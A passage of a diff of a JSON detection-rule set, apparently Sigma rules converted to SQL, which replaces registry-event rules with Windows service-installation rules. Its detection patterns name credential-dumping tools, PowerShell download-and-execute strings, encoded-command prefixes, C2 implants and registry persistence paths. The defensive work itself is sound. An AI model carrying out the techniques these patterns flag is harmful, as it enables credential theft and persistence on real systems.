created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Windows Registry Trust Record Modification", - "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "author": "Antonlovesdnb", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_trust_record_modification.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ "attack.lateral_movement", - "attack.t1105" + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Path To Screensaver Binary Modified", - "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", - "status": "test", - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.002" + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate modification of screensaver" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_event_modify_screensaver_binary_path.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Remote Access Tool Services Have Been Installed - System", + "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "status": "experimental", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.t1547" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_service_install_remote_access_software.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1112" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "status": "experimental", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "status": "experimental", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", + "title": "New PDQDeploy Service - Client Side", + "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_service_install_pdqdeploy_runner.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Anydesk Remote Access Software Service Installation", + "id": "530a6faa-ff3d-4022-b315-50828e77eef5", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the anydesk tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_install_anydesk.yml" }, { - "title": "Office Application Startup - Office Test", - "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "title": "Tap Driver Installation", + "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "status": "test", - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "author": "omkar72", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.persistence", - "attack.t1137.002" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unlikely" + "Legitimate OpenVPN TAP insntallation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "registry_event_office_test_regadd.yml" + "filename": "win_system_tap_driver_installation.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Windows Service Terminated With Error", + "id": "acfa2210-0d71-4eeb-b477-afab494d596c", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" + "False positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7023')" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_service_terminated_error_generic.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "title": "PAExec Service Installation", + "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "status": "experimental", + "description": "Detects PAExec service installation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_service_install_paexec.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Removal Of SD Value to Hide Schedule Task - Registry", - "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "status": "experimental", - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", - "author": "Sittikorn S", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Removal of Potential COM Hijacking Registry Keys", - "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "status": "test", - "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027" ], "falsepositives": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft 